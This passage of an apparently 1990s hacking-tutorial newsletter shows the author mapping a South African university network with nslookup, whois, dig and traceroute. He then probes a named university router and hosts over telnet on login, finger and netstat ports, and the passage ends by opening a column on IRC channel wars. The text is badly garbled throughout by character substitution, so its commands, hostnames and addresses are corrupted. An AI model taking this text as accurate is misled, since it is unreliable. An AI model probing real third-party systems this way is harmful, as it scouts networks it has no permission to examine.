"e't we need to know the domain name for Botswana& #o do that 1 look u. the list of to. le<el domain names on .age %K9 of the ,99K edition of F2"S and B1"2F& Hor Botswana itbs bw& So 1 enter it at the .rom.t( remembering ?? this is C35; im.ortant ?? to .ut a .eriod after the domain name: V bw& Ser<er: swc.&com *ddress: ,9D&59&,,5&"on?authoritati<e answer: #his `non?authoritati<e answera stuff tells me that this information has been stored for awhile( so it is .ossible( but unlikely( that the information below has changed& bw nameser<er W 2*1S;&33&0"2&*/&Q* bw nameser<er W 5*1"&+SG&/46 bw nameser<er W "S&00&"3# bw nameser<er W H1++4&50&*/&Q* *uthoritati<e answers can be found from: 2*1S;&33&0"2&*/&Q* inet address W ,GE&-%M&,9-&,D 5*1"&+SG&/46 inet address W ,GK&-D&M&%G "S&00&"3# inet address W ,%K&%9&,&% H1++4&50&*/&Q* inet address W ,GE&-%,&,-D&, 1 look u. the domain name `>aa and disco<er it stands for South *frica& #his tells me that the 1nternet is in its infancy in Botswana ?? no nameser<ers there ?? but must be well along in South *frica& 7ook at all those nameser<ers ))))))))))))))))))))))) "ewbie note: a nameser<er is a com.uter .rogram that stores data on the 2omain "ame System& #he 2omain "ame System makes sure that no two com.uters ha<e the same name& 1t also stores information on how to find other com.uters& When <arious nameser<ers get to talking with each other( they e<entually( usually within seconds( can figure out the routes to any one of the millions of com.uters on the 1nternet& ))))))))))))))))))))))) Well( what this tells me is that .eo.le who want to set u. 1nternet host com.uters in Botswana usually rely on com.uters in South *frica to connect

them& 7etbs learn more about South *frica& Since we are still in the nslooku. .rogram( 1 command it to tell me what com.uters are nameser<ers for South *frica: V >a& Ser<er: swc.&com *ddress: ,9D&59&,,5&"on?authoritati<e answer: >a nameser<er W 2*1S;&33&0"2&*/&>a >a nameser<er W 0/#H+U&0/#&*/&>a >a nameser<er W H1++4&50&*/&>a >a nameser<er W 5*1"&+SG&/46 >a nameser<er W 60""*51&4Q&*0 >a nameser<er W "S&30&"3# >a nameser<er W "S&00&"3# >a nameser<er W 00/+?GW?,&+*&23/&/46 >a nameser<er W *+13S&H52&*/&>a *uthoritati<e answers can be found from: 2*1S;&33&0"2&*/&>a inet address W ,GE&-%M&,9-&,D 0/#H+U&0/#&*/&>a inet address W ,%K&,5D&,-D&, H1++4&50&*/&>a inet address W ,GE&-%,&,-D&, 5*1"&+SG&/46 inet address W ,GK&-D&M&%G 60""*51&4Q&*0 inet address W ,-D&-5M&--&60""*51&4Q&*0 inet address W ,-D&-5M&,&-, "S&30&"3# inet address W ,9-&,E&-M-&,, 00/+?GW?,&+*&23/&/46 inet address W -MG&,-%&-&,D 00/+?GW?,&+*&23/&/46 inet address W ,E&,&M&,D *+13S&H52&*/&>a inet address W ,%K&-,G&DM&, ))))))))))))))))))))))) "ewbie note: What is inet address W ,%K&-,G&DM&, su..osed to mean? #hatbs the name of a com.uter on the 1nternet !inet$ ?? in this case *+13S&H52&*/ ?? in octal& 4ctal is like regular numbers e'ce.t in base D rather than base ,M& *ll com.uter names on the 1nternet must be changed into numbers so that other com.uters can understand them& )))))))))))))))))))))) *ha Some of those nameser<ers are located outside South *frica& We see com.uters in *ustralia !au$ and the 0S !com domain$& "e't( we e'it the nslooku. .rogram with the command B2& #hatbs made by holding down the

control key while hitting the small `da key& 1t is C35; 16+45#*"# to e'it nslooku. this way and not with B/& "e't( we take one of the nameser<ers in South *frica and ask: ?Vwhois H1++4&50&*/&Q* Y"o nameZ !H1++4$ Hostname: H1++4&50&*/&Q* *ddress: ,GE&-%,&,-D&, System: S0" running S0"4S 2omain Ser<er 5ecord last u.dated on -G?Heb?9-& #o see this host record with registered users( re.eat the command with a star !')'$ before the nameA or( use 'P' to show R0S# the registered users& #he 1nter"1/ 5egistration Ser<ices Host contains 4"7; 1nternet 1nformation !"etworks( *S"'s( 2omains( and +4/'s$& +lease use the whois ser<er at nic&ddn&mil for 617"3# 1nformation& 8ewl #his tells us what kind of com.uter it is ?? a Sun ?? and the o.erating system( Sun 4S& "ow( =ust for <ariety( 1 use the whois command with the numerical address of one of the nameser<ers& #his doesnbt always gi<e back the te't name( but sometimes it works& *nd( <oila( we get: ?Vwhois ,GE&-%M&,9-&,D Y"o nameZ !2*1S;,$ Hostname: 2*1S;&33&0"2&*/&Q* *ddress: ,GE&-%M&,9-&,D System: H+?9MMM running H+?0U 2omain Ser<er 5ecord last u.dated on ,G?Se.?9G&

*h( but all this is doing so far is =ust telling us info about who is a nameser<er for whom& "ow how about directly ma..ing a route from my com.uter to South *frica? Hor that we will use the traceroute command& )))))))))))))))))))))))) "eti@uette ti.: #he traceroute .rogram is intended for use in network testing( measurement and management& 1t should be used .rimarily for manual fault isolation( like the time 1 couldnbt email my friend in "orthern 1reland& Because of the load it could im.ose on the network( it is unwise to use traceroute from automated scri.ts which could cause that .rogram to send out huge numbers of @ueries& 0se it too much and your 1S+ may start asking you some shar. @uestions& )))))))))))))))))))))))) )))))))))))))))))))))))) ;40 /4072 G4 #4 R*17 W*5"1"G: 1f you =ust got an idea of how to use traceroute for a denial of ser<ice attack( donbt call your fa<orite =ournalist and tell him or her that you are .lotting a denial of ser<ice attack against the 1S+s that ser<e famous .eo.le like Bill /linton and /arolyn 6einel :?$ 2onbt write that scri.t& 2onbt use it& 1f you do( 1bll gi<e another inter<iew to +/ World maga>ine !htt.:IIwww&.cworld&comInewsInewsradioImeinelIinde'&html$ about how a three?year?old could run the attack& *nd if you get caught webll all laugh at you as you get hustled off in chains while your =ournalist friend gets a O-5M8 ad<ance on his or her book deal about you& )))))))))))))))))))))))) 1 gi<e the command: ?Vwhereis traceroute traceroute: IusrIlocalIbinItraceroute 48( now webre ready to ma. in earnest& 1 gi<e the command: ?VIusrIlocalIbinItraceroute 2*1S;&33&0"2&*/&Q* *nd the answer is: traceroute to 2*1S;&33&0"2&*/&Q* !,GE&-%M&,9-&,D$( %M ho.s ma'( GM byte .ackets , sisko !,9D&59&,,5&,$ % ms G ms G ms

- glory?cyber.ort&nm&westnet&net !-MG&,%G&KD&%%$ GK ms D ms G ms % 3"SS%E5&"6&45G !,-9&,-,&,&%$ 5 ms ,M ms K ms G hG?M&cnss,,E&*lbu@uer@ue&t%&ans&net !,9-&,M%&KG&G5$ ,K ms G, ms -D ms 5 f-&t,,-?M&*lbu@uer@ue&t%&ans&net !,GM&---&,,-&--,$ K ms E ms 5 ms E h,G&t,E?M&7os?*ngeles&t%&ans&net !,GM&--%&,K&9$ %, ms %9 ms DG ms K h,G&tD?M&San?Hrancisco&t%&ans&net !,GM&--%&9&,%$ EK ms G% ms ED ms D enss--M&t%&ans&net !,GM&--%&9&--$ K% ms 5D ms 5G ms 9 sl?mae?w?HMIM&s.rintlink&net !,9D&%-&,%E&,,$ 9K ms %,9 ms ,,M ms ,M sl?stk?,?H,,IM?#%&s.rintlink&net !,GG&--D&,M&,M9$ %,% ms GK9 ms GK% ms ,, sl?stk?-?HI#&s.rintlink&net !,9D&EK&E&-$ ,K9 ms ) ) ,- sl?dc?K?HGIM?#%&s.rintlink&net !,GG&--D&,M&,ME$ ,EG ms ) ,KE ms ,% sl?dc?K?HI#&s.rintlink&net !,9D&EK&M&,$ ,G% ms ,-9 ms ,%G ms ,G gsl?dc?%?HddiMIM&gsl&net !-MG&59&,GG&,9K$ ,%5 ms ,5- ms ,%M ms ,5 -MG&59&--5&EE !-MG&59&--5&EE$ 5D% ms 5G5 ms 5E5 ms ,E ) ) ) ,K eM&csirMM&uni&net&>a !,55&-%-&-G9&,$ 5,E ms G%E ms GMM ms ,D s,&undMM&uni&net&>a !,55&-%-&KM&,$ G-G ms GD5 ms G9- ms ,9 eM&undM,&uni&net&>a !,55&-%-&,9M&-$ 5M9 ms 5%M ms G59 ms -M sM&undM-&uni&net&>a !,55&-%-&D-&-$ E5M ms ) 5GD ms -, Gw?0ninet,&//&und&ac&>a !,GE&-%M&,9E&,$ DD, ms 5,K ms GKD ms -- cisco?un.&und&ac&>a !,GE&-%M&,-D&D$ G9D ms 5G5 ms ) -% 1"&ee&und&ac&>a !,GE&-%M&,9-&,D$ 5K% ms 5D5 ms G9% ms So what does all this stuff mean? #he number in front of each line is the number of ho.s since lea<ing the com.uter that has the shell account 1 am using& #he second entry is the name of the com.uter through which this route .asses( first in te't( and then in .arentheses its numerical re.resentation& #he numbers after that are the time in milliseconds it takes for each of three .robe .ackets in a row to make that ho.& When an ) a..ears( the time for the ho. timed out& 1n the case of this traceroute command( any time greater than % seconds causes an ) to be .rinted out& How about ho. ,E? 1t ga<e us no info whatsoe<er& #hat silent gateway may be the result of a bug in the G&,( G&- or G&%BS2 0ni' network code& * com.uter running one of these o.erating systems sends an `unreachablea

message& 4r it could be something else& Sorry( 1bm not enough of a genius yet to figure out this one for sure& *re we ha<ing .hun yet? )))))))))))))))))))))))) 3<il genius ti.: 1f you want to get really( truly e'cruciating detail on the traceroute command( while in your shell account ty.e in the command: ?Vman traceroute 1 .romise( on?line manual stuff is often written in a witty( entertaining fashion& 3s.ecially the Sun 4S manual& Honest )))))))))))))))))))))))) )))))))))))))))))))))))) "ote for the shell?account?challenged: 1f you ha<e Windows 95( you can get the same results ?? 1 mean( for ma..ing the 1nternet( not going to =ail ?? using the `tracerta command& Herebs how it works: ,& 4.en a +++ connection& Hor e'am.le( if you use /om.user<e or *47( make a connection( then minimi>e your on?line access .rogram& -& /lick on the Start menu& %& 4.en a 24S window& G& *t the 24S .rom.t ty.e in `tracert ^distant&com.uter&comV where `distant&com.uter&coma is re.laced by the name of the com.uter to which you want to trace a route& +ress the 3nter key& 5& Be .atient& 3s.ecially if your are tracing a route to a distant com.uter( it takes awhile to make all the connections& 3<ery time your com.uter connects to another com.uter on the 1nternet( it first has to trace a route to the other com.uter& #hatbs why it sometimes take a long while for your browser to start downloading a Web .age& E& 1f you decide to use Windows for this hacking lesson( 2amien Sorder has a message for us: `24"'# 3"/405*G3 #H36 #4 0S3 W1"95 J9O J9 a Hebs right( but since most of you reading this are consenting adults( 1 figure itbs your funeral if you stoo. to Windows hacking on an *47 +++ connection ))))))))))))))))))))))) "ow this is getting interesting& We know that 2aisy is directly connected to at least one other com.uter( and that com.uter in turn is connected to cisco? un.&und&ac&>a& 7etbs learn a little something about this cisco?un.&und&ac&>a( 48?

Hirst( we can guess from the name that is it a /isco router& 1n fact( the first ho. in this route is to a com.uter named `sisco(a which is also .robably a /isco router& Since D5P of the routers in the world are /iscos( thatbs a .retty safe bet& But we are going to not only make sure cisco?un.&und&ac&>a is a /isco& We are also going to find out the model number( and a few other goodies& Hirst we try out whois: ?Vwhois cisco?un.&und&ac&>a "o match for :/1S/4?0"+&0"2&*/&Q*:& #he 1nter"1/ 5egistration Ser<ices Host contains 4"7; 1nternet 1nformation !"etworks( *S"'s( 2omains( and +4/'s$& +lease use the whois ser<er at nic&ddn&mil for 617"3# 1nformation& Huh? #raceroute tells us cisco?un.&und&ac&>a e'ists( but whois canbt find it *ctually this is a common .roblem( es.ecially trying to use whois on distant com.uters& What do we do ne't? Well( if you are lucky( the whereis command will turn u. another incredibly cool .rogram: dig )))))))))))))))))))))) "ewbie note: 2ig stands for `domain information gro.er&a 1t does a lot of the same things as nslooku.& But dig is a much older .rogram( in many ways harder to use than nslooku.& Hor details on dig( use the command from your shell account `man dig&a )))))))))))))))))))))) 1n fact( on my shell account 1 found 1 could run dig straight from my bash .rom.t: ?Vdig /1S/4?0"+&0"2&*/&Q* A ^^VV 2iG -&M ^^VV /1S/4?0"+&0"2&*/&Q* AA res o.tions: init recurs defnam dnsrch AA got answer: AA ?VVH3*235^^? o.code: S035;( status: "435545( id: E AA flags: @r aa rd raA Sues: ,( *ns: G( *uth: 5( *ddit: 5 AA S03S#14"S: AA /1S/4?0"+&0"2&*/&Q*( ty.e W *( class W 1"

AA *"SW35S: /1S/4?0"+&0"2&*/&Q*& /1S/4?0"+&0"2&*/&Q*& /1S/4?0"+&0"2&*/&Q*& /1S/4?0"+&0"2&*/&Q*&

DEGMM DEGMM DEGMM DEGMM

* * * *

,GE&-%M&-GD&, ,GE&-%M&,-&, ,GE&-%M&EM&, ,GE&-%M&,-D&D

AA *0#H451#; 53/452S: und&ac&>a& DEGMM "S 3agle&und&ac&>a& und&ac&>a& DEGMM "S Shrike&und&ac&>a& und&ac&>a& DEGMM "S ucth.'&uct&ac&>a& und&ac&>a& DEGMM "S hi++o&ru&ac&>a& und&ac&>a& DEGMM "S 5ain&.sg&com& AA *221#14"*7 53/452S: 3agle&und&ac&>a& DEGMM * ,GE&-%M&,-D&,5 Shrike&und&ac&>a& DEGMM * ,GE&-%M&,-D&,% ucth.'&uct&ac&>a& DEGMM * ,%K&,5D&,-D&, hi++o&ru&ac&>a& DEGMM * ,GE&-%,&,-D&, 5ain&.sg&com& ,GGMM * ,GK&-D&M&%G AA #otal @uery time: 5,E msec AA H546: llama to S35C35: default ?? ,9D&59&,,5&AA WH3": Hri Ran ,K ,%:M%:G9 ,99K AA 6SG S1Q3 sent: %K rc<d: %M5 *hhh( nice& #he first few lines( the ones .receded by the AA marks( mostly tell what the default settings of the command are and what we asked it& #he line `Sues: ,( *ns: G( *uth: 5( *ddit: 5a tells us how many items webll get under each to.ic of @uestions( answers( authority records( and additional records& !;ou will get different numbers on that line with different @ueries&$ #his `recordsa stuff refers to information stored under the domain name system& We learn from dig is that /7*SSW1"( meaning /1S/4?0"+&0"2&*/&Q* is a domain name within the 1nternet& But we already knew that & #he first really )new) thing we learn is that four routers all share the same domain name& We can tell that because their numerical 1nternet numbers are different& #he re<erse can also ha..en: se<eral domain names can all belong to the same numerical address& 1f you use the dig command on each link in the route to 2*1S;&33&0"2&*/&Q*( youbll find a tremendous <ariation in whether the

routers ma. to same or different domain names& *s hackers( we want to get wise to all these <ariations in how domain names are associated with bo'es& But we can still learn e<en more about that /isco router named /1S/4? 0"+&0"2&*/&Q*& We go back to nslooku. and run it in interacti<e mode: ?VIusrIetcInslooku. 2efault Ser<er: swc.&com *ddress: ,9D&59&,,5&V "ow letbs do something new with nslooku.& #his is a command that comes in really( really handy when webre .laying <igilante and need to .ersecute a s.ammer or bust a child .orn Web site or two& Herebs how we can get the email address for the sysadmin of an 1nternet host com.uter& V set ty.eWsoa #hen 1 enter the name of the com.uter about which 1 am curious& "ote that 1 .ut a .eriod after the end of the host name& 1t often hel.s to do this with nslooku.: V /1S/4?0"+&0"2&*/&Q*& Ser<er: swc.&com *ddress: ,9D&59&,,5&))) "o start of authority >one information is a<ailable for /1S/4? 0"+&0"2&*/&Q*& "ow what do 1 do? Gi<e u.? "o( 1bm a hacker wannabe( right? So 1 try entering =ust .art of the domain name( again remembering to .ut a .eriod at the end: V und&ac&>a& Ser<er: swc.&com *ddress: ,9D&59&,,5&und&ac&>a origin W 3agle&und&ac&>a mail addr W .ostmaster&und&ac&>a serialW,99E,M-55( refreshW,MDMM( retryW%EMM( e'.ireW%MMMMMM( minWDEGMM 3agle&und&ac&>a inet address W ,GE&-%M&,-D&,5

Shrike&und&ac&>a inet address W ,GE&-%M&,-D&,% ucth.'&uct&ac&>a inet address W ,%K&,5D&,-D&, hi++o&ru&ac&>a inet address W ,GE&-%,&,-D&, 5ain&.sg&com inet address W ,GK&-D&M&%G Bingo 1 got the email address of a sysadmin whose domain includes that /isco router( *"2 the 1+ addresses of some other bo'es he or she administers& But notice it doesnbt list any of those routers which the sysadmin undoubtedly knows a thing or two about& But we arenbt done yet with cisco?un.&und&ac&>a !,GE&-%M&,-D&D$& 4f course we ha<e a .retty good guess that it is a /isco router& But why sto. with a mere guess when we can .ort surf? So we fall back on our friend the telnet .rogram and head for .ort -MM,: ?Vtelnet ,GE&-%M&,-D&D -MM, #rying ,GE&-%M&,-D&D &&& /onnected to ,GE&-%M&,-D&D& 3sca.e character is 'BZ'& / )))))))))))))))))))))))))))))))))))))))))))))))))))) ))) Welcome to the 0ni<ersity of "atal ))) ))) ))) ))) 6odel : /isco G5MM with *#6 and D B51 .orts ))) ))) ))) ))) 2imension 2ata 2urban ? M%,?D%D%%% ))) ))) ))) ))))))))))))))))))))))))))))))))))))))))))))))))))) Hey( we know now that this is a /isco model G5MM owned by the 0ni<ersity of "atal( and we e<en got a .hone number for the sysadmin& Hrom this we also can infer that this router handles a subnet which ser<es the 0 of "atal and includes daisy& But why did 1 telnet to .ort -MM,? 1tbs in common use among routers as the administrati<e .ort& How do 1 know that? Hrom the 5H/ !re@uest for comments$ that co<ers all commonly used .ort assignments& ;ou can find a co.y of this 5H/ at htt.:IIds-&internic&netIrfcIrfc,KMM&t't& 5ead it and youbll be in for some ha..y .ort surfing ))))))))))))))))))))))))

3<il Genius ti.: there are a bunch of .orts used by /isco routers: cisco?fna ,%MItc. cisco H"*#1C3 cisco?tna ,%,Itc. cisco #"*#1C3 cisco?sys ,%-Itc. cisco S;S6*1"# licensedaemon ,9DEItc. cisco license management tr?rsrb?., ,9DKItc. cisco 5S5B +riority , .ort tr?rsrb?.,9DDItc. cisco 5S5B +riority - .ort tr?rsrb?.% ,9D9Itc. cisco 5S5B +riority % .ort stun?., ,99MItc. cisco S#0" +riority , .ort stun?.,99,Itc. cisco S#0" +riority - .ort stun?.% ,99-Itc. cisco S#0" +riority % .ort snm.?tc.?.ort ,99%Itc. cisco S"6+ #/+ .ort stun?.ort ,99GItc. cisco serial tunnel .ort .erf?.ort ,995Itc. cisco .erf .ort tr?rsrb?.ort ,99EItc. cisco 5emote S5B .ort gd.?.ort ,99KItc. cisco Gateway 2isco<ery +rotocol '-5?s<c?.ort ,99DItc. cisco U&-5 ser<ice !U4#$ tc.?id?.ort ,999Itc. cisco identification .ort )))))))))))))))))))))))) But what about the `normala telnet .ort( which is -%? Since it is the `normala .ort( the one you usually go to when you want to log in( we donbt need to .ut the -% after the host name: ?Vtelnet ,GE&-%M&,-D&D #rying ,GE&-%M&,-D&D &&& /onnected to ,GE&-%M&,-D&D& 3sca.e character is 'BZ'& / )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) ))))))) ))) Welcome to the 0ni<ersity of "atal ))) ))) ))) ))) 6odel : /isco G5MM with *#6 and D B51 .orts ))) ))) ))) ))) 2imension 2ata 2urban ? M%,?D%D%%% ))) ))) ))) )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) ))))))) 0ser *ccess Cerification

+assword: Hey( this is interesting( no username re@uested( =ust a .assword& 1f 1 were the sysadmin( 1bd make it a little harder to log in& Hmmm( what ha..ens if 1 try to .ort surf finger that site? #hat means telnet to the finger .ort( which is K9: ?Vtelnet ,GE&-%M&,-D&D K9 #rying ,GE&-%M&,-D&D &&& /onnected to ,GE&-%M&,-D&D& 3sca.e character is 'BZ'& / )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) ))))))) ))) Welcome to the 0ni<ersity of "atal ))) ))) ))) ))) 6odel : /isco G5MM with *#6 and D B51 .orts ))) ))) ))) ))) 2imension 2ata 2urban ? M%,?D%D%%% ))) ))) ))) )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) ))))))) 7ine 0ser Host!s$ 1dle 7ocation ) - <ty M idle M kitsune&swc.&com B5M:Sync +++ MM:MM:MM B5M:, Sync +++ MM:MM:MM B5,:Sync +++ MM:MM:MM B5,:, Sync +++ MM:MM:MM B5-:Sync +++ MM:MM:M, B5-:, Sync +++ MM:MM:MM B55:, Sync +++ MM:MM:MM /onnection closed by foreign host& "otice that finger lists the connection to the com.uter 1 was .ort surfing from: kitsune& But no one else seems to be on line =ust now& +lease remember( when you .ort surf( unless you know how to do 1+ s.oofing( your target com.uter knows where you came from& 4f course 1 will be a .olite guest& "ow letbs try the ob<ious& 7etbs telnet to the login .ort of daisy& 1 use the numerical address =ust for the heck of it:

?Vtelnet ,GE&-%M&,9-&,D #rying ,GE&-%M&,9-&,D &&& /onnected to ,GE&-%M&,9-&,D& 3sca.e character is 'BZ'& "etBS2Ii%DE !daisy&ee&und&ac&>a$ !tty.M$ login: Hey( this is interesting& Since we now know this is a uni<ersity( thatbs .robably the electrical engineering !33$ de.artment& *nd "etBS2 is a freeware 0ni' that runs on a +/ +robably a DM%DE bo'& Getting this info makes me almost feel like 1b<e been hanging out at the 0ni<ersity of "atal 33 com.uter lab& 1t sounds like a friendly .lace& Rudging from their router( security is somewhat la'( they use chea. com.uters( and messages are friendly& 7etbs finger and see whobs logged in =ust now: Since 1 am already in the telnet .rogram !1 can tell by the .rom.t `telnetV`$( 1 go to daisy using the `o.ena command: telnetV o.en daisy&ee&und&ac&>a K9 #rying ,GE&-%M&,9-&,D &&& telnet: connect: /onnection refused telnetV @uit Well( that didnbt work( so 1 e'it telnet and try the finger .rogram on my shell account com.uter: ?Vfinger Jdaisy&ee&und&ac&>a Ydaisy&ee&und&ac&>aZ finger: daisy&ee&und&ac&>a: /onnection refused Sigh& 1tbs hard to find o.en finger .orts any more& But itbs a good security .ractice to close finger& 2amien Sorder .oints out( `1f you install the new 7inu' distributions( it comes with /fingerd& Why would 1 !and others$ want to shut it down? "ot because of hackers and abuse or some S#0+12 S))) like that& Because it gi<es out way too much information when you finger a single user& ;ou get machine load and all the user information&a

1 manage to .ull u. a little more info on how to ma. the interconnections of 0ni<ersity of "atal com.uters with an search of the Web using htt.:IIdigital&alta<ista&com& 1t links me to the site htt.:IIwww&frd&ac&>aIuninetIs.rint&html( which is titled `#raffic on the 0"1"3#?S+51"#71"8 7ink&a Howe<er( all the links to netwrok traffic statistics from that site are dead& "e't( letbs look into number -M on that traceroute that led us to the 0ni<ersity of "atal& ;ou can .retty much e'.ect that links in the middle of a long traceroute will be big com.uters owned by the bigger com.anies that form the backbone of the 1nternet& ?Vtelnet ,55&-%-&D-&- -MM, #rying ,55&-%-&D-&- &&& /onnected to ,55&-%-&D-&-& 3sca.e character is 'BZ'& 1d: undM*uthorised 0sers 4nly ???????????????????????? 0ser *ccess Cerification 0sername: ;u.( webre out of friendly territory now& *nd since .ort -MM, works( it may be a router& Rust for laughs( though( letbs go back to the default telnet .ort: ?Vtelnet ,55&-%-&D-&#rying ,55&-%-&D-&- &&& /onnected to ,55&-%-&D-&-& 3sca.e character is 'BZ'& 1d: undM*uthorised 0sers 4nly ???????????????????????? 0ser *ccess Cerification

0sername: "ow =ust maybe this backbone?ty.e com.uter will tell us gobs of stuff about all the com.uters it is connected to& We try telneting to the netstat .ort( ,5& #his( if it ha..ens to be o.en to the .ublic( will tell us all about the com.uters that connect through it: ?Vtelnet ,55&-%-&D-&- ,5 #rying ,55&-%-&D-&- &&& telnet: connect: /onnection refused Sigh& 1 ga<e an e'am.le of the incredible wealth of information you can get from netstat on the G#6HH on .ort surfing& But e<ery day it is harder to find a .ublic netstat .ort& #hatbs because the information netstat gi<es is so useful to com.uter criminals& 1n fact( .ort ,5 is no longer reser<ed as the netstat .ort !as of ,99G( according to the 5H/$& So you will find few bo'es using it& )))))))))))))))))))))))))))))) "ewbie note: want to know what .ort assignments your 1S+ uses? Sorder .oints out ` IetcIser<ices on most machines will Ytell you thisZ&a How can you can read that information? #ry this: Hirst( change to the IetcI directory: ?Vcd Ietc #hen command it to .rint it out to your screen with: ?Vmore ser<ices 9 9 J!9$ser<ices ,&,E 9MIM,IM% S61 9 9 "etwork ser<ices( 1nternet style 9 #his file is ne<er consulted when the "1S are running 9 tc.mu' ,Itc. 9 rfc?,MKD echo KItc. &&& and so on&&&

*las( =ust because your shell account has a list of .ort assignments doesnbt mean they are actually in use& 1t also .robably wonbt list s.eciali>ed ser<ices like all those /isco router .ort assignments& ))))))))))))))))))))))))) 1n fact( after surfing about two do>en somewhat randomly chosen netstat .orts( the only answer 1 get other than `/onnection refuseda is: ?Vtelnet ns&nmia&com ,5 #rying ,9D&59&,EE&,M &&& /onnected to ns&nmia&com& 3sca.e character is 'BZ'& ;es( but will 1 see the 3*S#35 B0""; in skintight leather at an 154" 6*123" concert? "ow what about all those S.rintlink routers in that traceroute? #hatbs a ma=or 1nternet backbone based in the 0S .ro<ided by S.rint& ;ou can get some information on the to.ology of the S.rintlink backbone at htt.:IIwww&s.rintlink&netIS+78IHB-,&html9-&-& *las( S.rintlink used to gi<e out much more information than they do today& *ll 1 can .ick u. on their Web site today is .retty <ague& Sigh& #he 1nternet is getting less friendly( but more secure& Some day when webre really ancient( say fi<e years from now( webll be telling .eo.le( `Why( 1 remember when we could .ort surf Why( there used to be >illions of o.en .orts and .eo.le could choose *"; .assword they wanted& Hm.h #oday itbs =ust firewalls e<erywhere you look a *dds Sorder( `Gee& How do you think .eo.le like me feel&& .ort surfing o<er E years ago&a 4ur thanks to 2amien Sorder !=erichoJdimensional&com$ for assistance in re<iewing and contributing to this G#6HH& FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF G0123 #4 !mostly$ H*5673SS H*/81"G Col& % "umber % How to kee. from getting kicked off 15/ FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

4ur thanks to +atrick 5utledge( Warbeast( 6eltdown and k,ne#i8( who all .ro<ided in<aluable information on the burning @uestion of the 15/ world: hel.( theybre nuking meee&&& Whatbs the big deal about 15/ and hackers? Sheesh( 15/ is sooo easy to use&&& until you get on a ser<er where hacker wars reign& What the heck do you do to kee. from getting clobbered o<er and o<er again? 4f course you could =ust decide your enemies can go to heck& But letbs say youbd rather hang in there& ;ou may want to hang in there because if you want to make friends @uickly in the hacker world( one of the best ways is o<er 1nternet 5elay /hat !15/$& 4n 15/ a grou. of .eo.le ty.e messages back and forth on a screen in almost real time& 1t can be more fun than 0senet where it can take from minutes to hours for .eo.lebs re.lies to turn u.& *nd unlike 0senet( if you say something you regret( itbs soon gone from the screen& *hem& #hat is( it will soon be gone if no one is logging the session& 1n some ways 15/ is like /B radio( with lots of folks flaming and making fools of themsel<es in uni@ue and irritating ways& So donbt e'.ect to see timeless wisdom and wit scrolling down your com.uter screen& But because 15/ is such an ine'.ensi<e way for .eo.le from all o<er the world to @uickly e'change ideas( it is widely used by hackers& *lso( gi<en the wars you can fight for control of 15/ channels( it can gi<e you a good hacker workout& #o get on 15/ you need both an 15/ client .rogram and you need to connect to a Web site or 1nternet Ser<ice +ro<ider !1S+$ that is running an 15/ ser<er .rogram& ))))))))))))))))))))))) "ewbie note: *ny .rogram that uses a resource is called a `client&a *ny .rogram that offers a resource is a `ser<er&a ;our 15/ client .rogram runs on either your home com.uter or shell account com.uter and connects you to an 15/ ser<er .rogram which runs on a remote com.uter somewhere on the 1nternet& ))))))))))))))))))))))) ;ou may already ha<e an 15/ ser<er running on your 1S+& /ustomer ser<ice at your 1S+ should be able to hel. you with instructions on how to use it&

3<en easier yet( if your Web browser is set u. to use Ra<a( you can run 15/ straight from your browser once you ha<e surfed into a Web?based 15/ ser<er& Where are good 15/ ser<ers for meeting other hackers? #here are se<eral 15/ ser<ers that usually offer hacker channels& 3H"et !3ris?Hree "etwork$links many 15/ ser<ers& 1t was originally started by the 3ris Hree"et !ef&net$& 1t is re.uted to be a `war grounda where you might get a chance to really .ractice the 15/ techni@ues we co<er below& 0ndernet is one of the largest networks of 15/ ser<ers& #he main .ur.ose of 0ndernet is to be a friendly .lace with 15/ wars under control& But this means( yes( lots of 15/ co.s #he o.erators of these 15/ ser<ers ha<e .ermission to kill you not only from a channel but also from a ser<er& Heck( they can ban you for good& #hey can e<en ban your whole domain& )))))))))))))))))))))))))))))))))))) "ewbie note: * domain is the last two !or sometimes three or four$ .arts of your email address& Hor e'am.le( aol&com is the domain name for *merica 4nline& 1f an 15/ network were to ban the aol&com domain( that would mean e<ery single .erson on *merica 4nline would be banned from it& )))))))))))))))))))))))))))))))))))) )))))))))))))))))))))))))))))))))))) ;ou can get .unched in the nose warning: 1f the sysadmins at your 1S+ were to find out that you had managed to get their entire domain banned from an 15/ net on account of committing 1/6+ bombing or whate<er( they will be truly mad at you ;ou will be lucky if the worst that ha..ens is that you lose your account& ;oubd better ho.e that word doesnbt get out to all the 15/ addicts on your 1S+ that you were the dude that got you guys all kicked out& )))))))))))))))))))))))))))))))))))) 15/"et is .robably the same si>e if not larger than 0ndernet& 15/"et is basically the 3uro.eanI*ustralian s.lit off from the old 3H"et& ;es( 15/ is a world?wide .henomenon& Get on the right 15/ network and you can be making friends with hackers on any continent of the .lanet& #here are at least DM 15/ networks in e'istence& #o learn how to contact them( surf o<er to: htt.:IIwww&irchel.&orgI& ;ou can locate additional 15/ ser<ers by surfing o<er to htt.:IIhotbot&com or htt.:IIdigital&alta<ista&com and searching

for `15/ ser<er&a Some 15/ ser<ers are ideal for the elite hacker( for e'am.le the lM.ht ser<er& "ote that is a `>eroa not an `4a in lM.ht& )))))))))))))))))))))))))))))))))))))))) 3<il genius ti.: Get on an 15/ ser<er by telneting straight in through .ort EEEK at the domain name for that ser<er& )))))))))))))))))))))))))))))))))))))))) But before you get too e'cited o<er trying out 15/( let us warn you& 15/ is not so much .hun any more because some dMMd> arenbt satisfied with using it to merely say naughty words and cast as.ersions on .eo.lebs ancestry and grooming habits& #hey get their laughs by kicking other .eo.le off 15/ entirely& #his is because they are too chicken to start brawls in bars& So they beat u. on .eo.le in cybers.ace where they donbt ha<e to fret o<er getting ouchies& But webre going to show some sim.le( effecti<e ways to kee. these lusers from ruining your 15/ sessions& Howe<er( first youbll need to know some of the ways you can get kicked off 15/ by these bullies& #he sim.lest way to get in trouble is to accidentally gi<e control of your 15/ channel to an im.ostor whose goal is to kick you and your friends off& ;ou see( the first .erson to start u. a channel on an 15/ ser<er is automatically the o.erator !4+$& #he o.erator has the .ower to kick .eo.le off or in<ite .eo.le in& *lso( if the o.erator wants to( he or she may .ass o.erator status on to someone else& 1deally( when you lea<e the channel you would .ass this status on to a friend your trust& *lso( maybe someone who you think is your good 